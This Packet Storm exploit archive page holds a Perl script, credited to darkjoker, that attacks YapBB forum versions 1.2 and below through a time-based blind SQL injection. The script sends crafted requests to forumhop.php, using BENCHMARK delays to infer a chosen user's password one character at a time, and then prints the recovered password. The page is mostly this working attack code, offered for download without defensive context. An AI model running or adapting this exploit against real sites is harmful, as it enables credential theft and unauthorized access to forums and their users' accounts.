exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

YapBB 1.2 Blind SQL Injection

YapBB 1.2 Blind SQL Injection
Posted Feb 4, 2009
Authored by darkjoker | Site darkjokerside.altervista.org

YapBB versions 1.2 and below remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 4f1c5776d73f7cba4a9de65aac18bd8f9ac08ec74e969296c6cffe6991b5cedd

YapBB 1.2 Blind SQL Injection

Change Mirror Download
--+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage
{
die "\nYapBB <= 1.2 Blind SQL Injection Exploit".
"\n[?] Author : darkjoker".
"\n[?] Site : http://darkjoker.net23.net".
"\n[?] CMS Site: http://yapbb.sourceforge.net/".
"\n[?] Usage : perl ${0} <hostname> <path> <username> [<key_list>]".
"\n[?] Ex. : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz".
"\n\n";
}

sub query
{
my ($user, $chr, $pos) = @_;
my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ".
"forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}

sub exploit
{
my ($hostname, $path, $user, $chr, $pos) = @_;
$chr = ord ($chr);
my $sock = new IO::Socket::INET (
PeerHost => $hostname,
PeerPort => 80,
Proto => "tcp"
) or die "\n[!] Exploit failed.\n\n";

my $query = query ($user, $chr, $pos);
my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1\r\n".
"Host: ${hostname}\r\n".
"Connection: Close\r\n\r\n";

my $a = time ();
print $sock $request;
$_++ while (<$sock>);
$a = ($a - time ()) * -1;
close ($sock);

return 1 if ($a > 4);
return 0;
}

my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789");
my $chr = 0;
my $pos = 1;
my $password;
while ($chr < scalar (@key))
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
$password .= $key [$chr];
$chr = 0;
$pos++;
}
else
{
$chr++;
}
}

print "\n[+] Password: ${password}\n\n";


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close